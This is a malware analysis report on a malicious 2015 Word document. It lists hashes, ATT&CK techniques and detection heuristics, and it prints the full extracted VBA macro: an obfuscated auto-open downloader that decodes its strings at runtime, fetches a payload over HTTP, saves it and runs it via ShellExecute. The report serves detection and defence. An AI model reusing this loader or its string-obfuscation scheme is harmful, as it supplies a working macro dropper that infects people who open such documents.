Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5d2500d1e1776adf…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 58.5 KB
Created: 2015-01-19 09:36:00
Authoring application: Microsoft Office Word
First seen: 2015-02-05
MD5: 0b91631d399a33bbe0417f1a4ed4c66b
SHA-1: 1093ffca5842ae90bb8fd80ca1e14cff8513e18a
SHA-256: 5d2500d1e1776adffe161bae934af1e52389d6134a3d14ce8d638fb6d6185fd2
Risk score: 306

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1105 Ingress Tool Transfer

The sample contains an obfuscated VBA macro that uses `CreateObject` and `ShellExecute` to download and execute a second-stage payload. The `AutoOpen` and `Workbook_Open` entry points call, through the intermediate subs `uiwefds` and `pKIOHiosdf`, the obfuscated function `vyllq8a`, which fetches the payload from a URL and runs it; every string it needs (the COM object names, the URL, the environment-variable name and the output path) is decoded at runtime by the `mqkX0Ayu` function. The specific URLs and object names are therefore not visible in the macro source, but the overall behavior is that of a downloader.

Heuristics (11)

  • ClamAV: Doc.Dropper.Agent-6421993-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6421993-0
  • VBA macros detected [medium, 6 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps the decoded CreateObject/Shell/URL indicators out of the static macro source.
    Matched line in script:
        Set oNJBJkdsfsdf = CreateObject(mqkX0Ayu("xnuvx454F3ObhRKtaH48mm97Tj519WP2ANr45u4JYq3YzY448tkga4g2Zwpt950F2gB71SjK4sDGTrmn515CiD59I5EM1li92uy4wD54L3pk4k4j84LXio4f24LcNEq8DoN4A9Wz564Rs9wR56rQAGCpp4720h8aq5"))
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script:
        Set oNJBJkdsfsdf = CreateObject(mqkX0Ayu("xnuvx454F3ObhRKtaH48mm97Tj519WP2ANr45u4JYq3YzY448tkga4g2Zwpt950F2gB71SjK4sDGTrmn515CiD59I5EM1li92uy4wD54L3pk4k4j84LXio4f24LcNEq8DoN4A9Wz564Rs9wR56rQAGCpp4720h8aq5"))
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only macro documents, or documents where source extraction failed, so that the finding does not depend on visible source.
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script:
        Sub AutoOpen()
  • Workbook_Open macro [low] OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script:
        Sub Workbook_Open()
  • Environ() call (env variable access) [low] OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script:
        xlapp.ShellExecute Environ(mqkX0Ayu("uvZ46D7w2y55Fe2HkCdy0i6wb8k616ijc6u40jXmRC")) & mqkX0Ayu("LMXl35V8v819Qs891EL95020GA28x1B9501wJ9892r028Fzelo3B9o391950Cm1h989O2K0c28t1H794YH393946WT80f3O939aqwJ")
  • Reference to ShellExecute API [high] SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface; by itself it is not a downloader or parser-CVE attribution.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7138 bytes
SHA-256: b2d163f4bb93f06a8fccd3fc90441edae69c78ab4dfe09e34e71799ae8742129
Detection: ClamAV: No threats found
Obfuscation or payload: likely (the carved artifact contains 4 long base64-like blobs)

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub uiwefds()
pKIOHiosdf
End Sub
Sub AutoOpen()
    uiwefds
End Sub
Sub Workbook_Open()
    uiwefds
End Sub
Function vyllq8a(ByVal vWebFile As String, ByVal pNJKBjkdsf As String) As Boolean
    Dim lLJ As Long, GYUbjsdf As Long, drdTYIdsf() As Byte
GoTo F3EUlsL
F3EUlsL:
     







    Set oNJBJkdsfsdf = CreateObject(mqkX0Ayu("xnuvx454F3ObhRKtaH48mm97Tj519WP2ANr45u4JYq3YzY448tkga4g2Zwpt950F2gB71SjK4sDGTrmn515CiD59I5EM1li92uy4wD54L3pk4k4j84LXio4f24LcNEq8DoN4A9Wz564Rs9wR56rQAGCpp4720h8aq5"))
GoTo vIMF7E
vIMF7E:
    oNJBJkdsfsdf.Open mqkX0Ayu("M3rH5hFO041489RxDGr613T71zeo9Ka5964UYBYn"), vWebFile, False
GoTo RMAdNKcIJW
RMAdNKcIJW:
    oNJBJkdsfsdf.Send
Dim y0IiLysLq As String
     







     






    drdTYIdsf = oNJBJkdsfsdf.responseBody
GoTo vDvd1aJ
vDvd1aJ:
     







    GYUbjsdf = FreeFile
GoTo ryobDYUX
ryobDYUX:
    If Dir(pNJKBjkdsf) <> "" Then Kill pNJKBjkdsf
GoTo PeOZe
PeOZe:
    Open pNJKBjkdsf For Binary Access Write As #GYUbjsdf
GoTo bknS
bknS:
    Put #GYUbjsdf, , drdTYIdsf
GoTo B0AiUg
B0AiUg:
    Close #GYUbjsdf
Dim vIEdN As Currency

    Set oNJBJkdsfsdf = Nothing
Dim cIRt4Ae As Double
    Dim xlapp As Object
GoTo YGt
YGt:
    Set xlapp = CreateObject(mqkX0Ayu("SCmjZ3wFtp48p6S4j3bB68gQ424ku2lMIMd4kDw536yC45L3lOso6XE1um9cf3j2Dn4A0N7Wz447RVQ0r4PsH4C7BnMSrhg818uMt42G0A4pOw453TIJx6441mr0DTiCuKec41q58oTUH4UA07Y4Of4as8M72LE4U4g10JBV4Mrtuh662S4SKf6lh20Cgqxf"))
GoTo JOP4E
JOP4E:
    xlapp.ShellExecute Environ(mqkX0Ayu("uvZ46D7w2y55Fe2HkCdy0i6wb8k616ijc6u40jXmRC")) & mqkX0Ayu("LMXl35V8v819Qs891EL95020GA28x1B9501wJ9892r028Fzelo3B9o391950Cm1h989O2K0c28t1H794YH393946WT80f3O939aqwJ")
GoTo QfmDLcA
QfmDLcA:
    End Function
Sub pKIOHiosdf()
GoTo TWAl
TWAl:
HUIBuerwfds = mqkX0Ayu("JB8j4dV3n68L48r72u48B72Ep4u70LP42I4Sa3619kHb74h19w74vJ20M58da23W5s22HNT3941932rdKq2C31t02YO39k41s9qP32i22K68KZW2142gv19w32Jq2V05M8fnDz613yA422a2TC68243oLt62l352Nl2zj01m6N23O5p220Y16MI1dV9n74L44r94u46B62Ep4u36LP81I9Sa7445kHb78h49w14vJ44M10da19W3s24HNT7044368rdKq4C70t4Et17")
Dim MBAbp As Boolean
     






vyllq8a HUIBuerwfds, Environ(mqkX0Ayu("WXGS5FO04h4e1c4oRxDm0r6GT64a62tm4A8k0IYBIn")) & mqkX0Ayu("VBJX39P56zdaY2Z19pSn3M2Q1S5K0CQbyc2so2362iy1gH5b0219zxKep3j2236keinWJgJV817EUB43q2eN15fL0D2A1N9Wz3rR22VP3D61a9j78BLH43E4BXxv35cGF160ZrO4xG3RD43JYTE")

End Sub
Function mqkX0Ayu(InputStringToBeDecrypted As String) As String
Dim rJ54OUtqS As String
Dim sIrDHBnBj As Object
Dim Dg3E As String
Dim LeZ As Date
Dim wsgK8OOm As String
Dim jEORug As Object
Dim pDYhkPBNg As String
GoTo HyYIF
HyYIF:
Dim AIZv5X1Ct As String
GoTo DERmyA
DERmyA:
Dim CFvi As Integer
GoTo updG7ULj
updG7ULj:
Dim e6IwavHZ As Integer
Dim dcFTKZgvE As Double
On Error GoTo ErrorHandler
Dim UUZahwG As Currency
strTempText = InputStringToBeDecrypted
Dim oQl As Date
rJ54OUtqS = strTempText
Dim picFbmq As String
Dg3E = ""
Dim yukk As Long
rJ54OUtqS = Left(rJ54OUtqS, Len(rJ54OUtqS) - 4)
GoTo Wo2aZS
Wo2aZS:
rJ54OUtqS = Right(rJ54OUtqS, Len(rJ54OUtqS) - 4)
Dim gCwB As Long
nCharSize = 0
Dim vm0LeZbpak As Object
Call Extract_Char_Size(rJ54OUtqS, nCharSize)
Dim JP5IYI1CiQqn As Long
Call Extract_Enc_Key(rJ54OUtqS, nCharSize, nEncKey)
Dim EJY As Object
nTextLenght = Len(rJ54OUtqS)
GoTo lmAV
lmAV:
For nCounter = 1 To Len(rJ54OUtqS) Step nCharSize
GoTo dXMo
dXMo:
pDYhkPBNg = Mid(rJ54OUtqS, nCounter, nCharSize)
Dim sEWCoQ As Byte
nChar = oLsDFg(pDYhkPBNg)
Dim jXH As Boolean
nChar2 = nChar / nEncKey
GoTo YWv
YWv:
AIZv5X1Ct = Chr(nChar2)
Dim lqsqsIrDH As Boolean
Dg3E = Dg3E + AIZv5X1Ct
Dim Z4Of As Object
Next nCounter
Dim PSvi8w As Byte
Dim FgCwBe As Long
Dim mFbuT0a6N As Variant
Dg3E = Trim(Dg3E)
Dim gs2EgnGcKiQ As String
 mqkX0Ayu = Dg3E
Dim pdGqnG6Irod As Date
Exit Function
ErrorHandler:
GoTo tak6AhD
tak6AhD:
End Function


Sub Extract_Char_Size(ByRef rJ54OUtqS, ByRef nCharSize)
Dim gfVj As String
DecryptParts = DecryptParts & "/Extract_Char_Size/"
Dim FbmqkXH As Boolean
nLeft = Len(rJ54OUtqS) \ 2
GoTo BeQcvqsIrD
BeQcvqsIrD:
strLeft = Left(rJ54OUtqS, nLeft)
Dim rB6UIJ As Variant
GoTo AZXwv
AZXwv:
nRight = Len(rJ54OUtqS) - nLeft
Dim R8AtJP As Byte
strRight = Right(rJ54OUtqS, nRight)
Dim Tb8I As Boolean
GoTo KiQqnPN
KiQqnPN:
strKeyEnc = Right(strLeft, 2)
Dim h2IKZgvE As Double
strKeySize = Left(strRight, 2)
Dim afa As String
strKeyEnc = viuOJK(strKeyEnc)
GoTo X1aPSviu2a
X1aPSviu2a:
strKeySize = viuOJK(strKeySize)
GoTo S0OBjfi2AsIB
S0OBjfi2AsIB:
nKeyEnc = Val(strKeyEnc)
Dim yAdPbupdG As Boolean
nKeySize = Val(strKeySize)
GoTo cF3aJ5UvE
cF3aJ5UvE:
nCharSize = nKeySize - nKeyEnc
Dim H7Um As Date
rJ54OUtqS = Left(strLeft, Len(strLeft) - 2) + Right(strRight, Len(strRight) - 2)
Dim XHy8Iviu2a As Byte
End Sub

Function viuOJK(ByVal cString As String) As String
DecryptParts = DecryptParts & "/ viuOJK/"
GoTo QX0
QX0:
For nCounter = 1 To Len(cString)
GoTo N01UZbpak
N01UZbpak:
pDYhkPBNg = Mid(cString, nCounter, 1)
Dim eL6O6od As Date
If IsNumeric(pDYhkPBNg) Then
Dim frwrtW8IbAi As Double
GoTo e3Ifr8OwGl
e3Ifr8OwGl:
strTempString = strTempString + pDYhkPBNg
Dim fVja7U4Hm As Date
Else
strTempString = strTempString + "0"
Dim KnKU As Double
End If
Next nCounter
Dim PSvi8w As Byte
Dim FgCwBe As Long
Dim mFbuT0a6N As Variant
 viuOJK = strTempString
Dim TCoYNMC0OsN As Variant
End Function

Function oLsDFg(strTempText As String) As Integer
DecryptParts = DecryptParts & "/ oLsDFg/"
GoTo nG5AYDE3OP
nG5AYDE3OP:
strTempText = Trim(strTempText)
Dim YWoTHh0UeU As Object
For nCounter = 1 To Len(strTempText)
Dim tSAZX As Long
pDYhkPBNg = Mid(strTempText, nCounter, 1)
Dim yY1UK As Currency
If IsNumeric(pDYhkPBNg) Then
Dim frwrtW8IbAi As Double
GoTo e3Ifr8OwGl
e3Ifr8OwGl:
rJ54OUtqS = rJ54OUtqS + pDYhkPBNg
GoTo lgkcA
lgkcA:
End If
Next nCounter
Dim PSvi8w As Byte
Dim FgCwBe As Long
Dim mFbuT0a6N As Variant
nResult = Val(rJ54OUtqS)
GoTo fiNsI0bp
fiNsI0bp:
 oLsDFg = nResult
Dim Q6OfVjapic As Byte
End Function

Sub Extract_Enc_Key(ByRef rJ54OUtqS, ByVal nCharSize, ByRef nEncKey)
Dim DFgCwB5Oqsq As Boolean
DecryptParts = DecryptParts & "/Extract_Enc_Key/"
GoTo M8AX
M8AX:
strEncKey = vbNullString
GoTo tVUKXPeXCJ
tVUKXPeXCJ:
CFvi = Len(rJ54OUtqS) - nCharSize
GoTo p41Iji
p41Iji:
nLeft = CFvi \ 2
GoTo f5OFn2OJ3Oaaf
f5OFn2OJ3Oaaf:
strLeft = Left(rJ54OUtqS, nLeft)
Dim rB6UIJ As Variant
GoTo AZXwv
AZXwv:
nRight = CFvi - nLeft
Dim EiU As Date
strRight = Right(rJ54OUtqS, nRight)
Dim Tb8I As Boolean
GoTo KiQqnPN
KiQqnPN:
strEncKey = Mid(rJ54OUtqS, nLeft + 1, nCharSize)
GoTo EdNC
EdNC:
strEncKey = viuOJK(strEncKey)
Dim QCOUPRt As Byte
nEncKey = Val(Trim(strEncKey))
Dim Y2UcDCrGwNF As Object
rJ54OUtqS = strLeft + strRight
Dim KS0EHtVp As Boolean
End Sub